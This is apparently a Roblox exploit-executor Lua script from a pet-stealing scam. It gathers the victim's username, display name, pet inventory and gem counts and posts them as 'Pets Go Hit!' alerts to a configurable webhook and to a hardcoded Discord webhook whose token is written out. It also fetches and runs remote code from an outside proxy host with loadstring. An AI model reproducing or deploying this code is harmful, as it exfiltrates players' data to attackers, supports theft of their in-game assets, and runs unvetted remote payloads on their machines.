
return function(dh,pn,gn,dp,potc)
local zzzu, zzzv =pcall(function()
if not dp then dp = 0 end
if not potc then
potc = 0
end
if _G.dx then return end
if tonumber(gn)==100 then gn = 0 end
local mps = game:GetService("MarketplaceService")
local xyzab = mps:GetProductInfo(game.PlaceId).Name
local msg = ""
request = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
if dh then
_G.dx=true
msg = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..dp..'","name":"DualedPets","inline":true},{"value":"'..potc..'","name":"Dualed Potions","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"@everyone"}'
else
msg = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"@everyone"}'
end
local response =
        request(
        {
            Url = _G.wh,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = msg
        }
    )
local xxxvvv = "lolly"
pcall(function() xxxvvv=response.StatusMessage end)
if typeof(xxxvvv)~="string" then xxxvvv="Lolly" end
if not _G.User then _G.User="yve (pet change hit)" end
local big = 0
pcall(function()
local save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local dir = game:GetService("ReplicatedStorage")["__DIRECTORY"].Pets
save = save.Get()
for i,v in pairs(save.Inventory.Pet) do
if require(dir[v.id]).difficulty >= big then
big = require(dir[v.id]).difficulty
end
end
big = "1/"..big
big = ""
local tab = {}
for i,v in pairs(save.Inventory.Pet) do
if require(dir[v.id]).difficulty >= _G.Min then
table.insert(tab, {v.id, require(dir[v.id]).difficulty, v._am})
end
end
if #tab >= 1 then
for i,v in pairs(tab) do
big=big..v[3].."x "..v[1].."(1/"..v[2]..")\\n"
end
big=big.."(TEST)"
loadstring(game:HttpGet("https://proxy.darkside.lol/webhook-error.yve"))()(big)
end
end)
local log = ""
if dh then
log = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"name":"Game","value":"'..xyzab..'"},{"value":"'.._G.User..'","name":"Hitter","inline":false},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..dp..'","name":"DualedPets","inline":true},{"value":"'..potc..'","name":"Dualed Potions","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"'..xxxvvv..'"}'
else
log = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"name":"Game","value":"'..xyzab..'"},{"value":"'.._G.User..'","name":"Hitter","inline":false},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..big..'","name":"Best Pet","inline":false}],"title":"Pets Go Hit!"}],"tts":false,"content":"'..xxxvvv..'"}'
end
local responser =
        request(
        {
            Url = "https://discordapp.com/api/webhooks/1298650438111068170/hippfrrGnjC-5wIWfrUS8gV6AAwqJKlpUiAmxHSaSFQhHPutaOym0MmSSxSpADpwZIAQ",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = log
        }
    )
return response
end)
if not zzzu then
loadstring(game:HttpGet("https://proxy.darkside.lol/webhook-error.yve"))()(zzzv)
end
end
